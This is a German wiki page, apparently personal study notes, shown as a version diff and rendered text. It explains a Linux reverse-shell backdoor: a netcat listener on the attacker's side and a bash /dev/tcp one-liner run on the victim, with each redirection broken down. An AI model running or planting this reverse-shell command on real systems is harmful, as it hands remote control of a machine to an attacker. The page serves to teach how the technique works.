Linux Backdoor: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 8: | Zeile 8: | ||
*bash -i > /dev/tcp/10.0.10.101/8686 2>&1 0>&1 | *bash -i > /dev/tcp/10.0.10.101/8686 2>&1 0>&1 | ||
=bash -i > /dev/tcp/10.0.10.101/8686= | =bash -i > /dev/tcp/10.0.10.101/8686= | ||
| − | Öffnet eine interaktive Shell und leitet die | + | Öffnet eine interaktive Shell und leitet die Standardausgabe den den Socket zu 10.0.10.101:8686 |
==2>&1== | ==2>&1== | ||
Legt den Fehlerkanal zum Standardausgabekanal | Legt den Fehlerkanal zum Standardausgabekanal | ||
==0>&1== | ==0>&1== | ||
Legt den Standardeingabekanal zum Standardausgabekanal | Legt den Standardeingabekanal zum Standardausgabekanal | ||
| + | |||
=Prinzip= | =Prinzip= | ||
{{#drawio:backdoor1}} | {{#drawio:backdoor1}} | ||
Version vom 13. März 2023, 19:35 Uhr
Angreifer
IP Angreifer 10.0.10.101
- netcat -lp 8686
Opfer
So findet man es im Internet
- bash -i >& /dev/tcp/10.0.10.101/8686 0>&1
Für mich besser lesbar
- bash -i > /dev/tcp/10.0.10.101/8686 2>&1 0>&1
bash -i > /dev/tcp/10.0.10.101/8686
Öffnet eine interaktive Shell und leitet die Standardausgabe den den Socket zu 10.0.10.101:8686
2>&1
Legt den Fehlerkanal zum Standardausgabekanal
0>&1
Legt den Standardeingabekanal zum Standardausgabekanal
![Bearbeiten](javascript:editDrawio("1582738653", "backdoor1.drawio.png", "png", false, false, false, true, "https://embed.diagrams.net")){kind=link}